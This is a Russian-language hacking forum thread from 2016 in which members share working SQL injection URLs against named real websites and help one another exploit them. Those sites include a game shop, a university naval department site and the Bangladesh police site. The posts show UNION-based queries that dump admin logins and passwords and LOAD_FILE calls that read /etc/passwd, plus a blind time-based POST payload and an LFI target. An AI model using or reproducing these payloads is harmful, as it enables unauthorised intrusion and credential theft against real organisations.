HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.10.2016, 22:56
Bobrenz
Новичок
Регистрация: 29.07.2015
Сообщений: 25
С нами: 5680406

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

Через юнион и не будет
может подскажите как? я дальше сам буду ковырять
 
Ответить с цитированием

  #2  
Старый 17.10.2016, 01:34
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами: 5043926

Репутация: 0
По умолчанию

никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная

http://www.gamepowerbazaar.com//stor...N+SELECT+1,2,3

вывод увидишь

пример:

http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLE S

фильтруются скобки походу ()

p.s.

.SpoilerTarget" type="button">Spoiler: или так
p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке:

http://i67.tinypic.com/23wk64l.jpg

то есть получаем вывод через error base sql injection

затем уже ручками выводим логины+ пассы

http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0, 1

1й админ

http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1, 1

2й админ

админку не искал ,да и странные пароли админов

а вообще это "commersus shop" .они уязвимы

вот почитай как пароли расшифровать

http://downloads.securityfocus.com/v...ce_mult_exp.pl

вот.
 
Ответить с цитированием

  #3  
Старый 17.10.2016, 21:51
bazaWT
Познающий
Регистрация: 19.03.2016
Сообщений: 42
С нами: 5343446

Репутация: 1
По умолчанию

Есть форма с ХSS в поле регистрации , но также есть токен , который не позволяет скопировать форму и юзать ее с хостинга . В таком случае никак не получится воспользоватся уязвимостю ? Или можно post переделать в get как то ?
 
Ответить с цитированием

  #4  
Старый 18.10.2016, 16:25
Bobrenz
Новичок
Регистрация: 29.07.2015
Сообщений: 25
С нами: 5680406

Репутация: 0
По умолчанию

найдена дырка в http://www.gamers-forum.com/misc.php тип инъекции (post) воот с такими параметрами, vsa_send=Submit&amount=if(now()%3dsysdate()%2cslee p(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22X OR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&chooser=5&securitytoken=guest

пробовал через мап и хавидж, на большее пока меня не хватило, подскажите есликто знает, как с этим дальше бороться?
 
Ответить с цитированием

  #5  
Старый 03.11.2016, 14:18
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Из-за Mod_Security не могу достоверно проверить, есть ли LFI

тут _ttp://kor.dk/musik/vespa/getid3/getid3.php

Exploit: _ttps://www.exploit-db.com/exploits/36664/
 
Ответить с цитированием

  #6  
Старый 04.11.2016, 04:44
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами: 9979143

Репутация: -5
По умолчанию

Как отфильтровать сайты в burpsuite? отображать только домен и его поддомены не зависимо от https/http

http://joxi.ru/GrqMLEyHQN0GLr
 
Ответить с цитированием

  #7  
Старый 04.11.2016, 20:58
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

http://gwps.org/36.0.html?&action=showDetails&showid=72

Как раскрутить? как слепая тоже не крутиться(

Таблица be_users колонка usename

Немогу данные выковырять
 
Ответить с цитированием

  #8  
Старый 05.11.2016, 11:45
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись

1 -

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-[/COLOR][/COLOR] 
2-

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-[/COLOR][/COLOR] 
как прочитать файл
 
Ответить с цитированием

  #9  
Старый 05.11.2016, 16:37
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

Цитата:
Сообщение от BabaDook  

Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-[/COLOR][/COLOR] 
2-
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-[/COLOR][/COLOR] 
как прочитать файл
LOAD_FILE('/etc/passwd') вместо user()
 
Ответить с цитированием

  #10  
Старый 05.11.2016, 16:52
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами: 5043926

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-[/COLOR][/COLOR] 
2-
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-[/COLOR][/COLOR] 
как прочитать файл
1

http://www.naval.iitkgp.ernet.in/me...file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+

или

http://www.naval.iitkgp.ernet.in/me...74632F706173737764),3,4,5,6,7,8,9,10,11,12--+

где 0x2F6574632F706173737764= hex(/etc/passwd)

2

нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.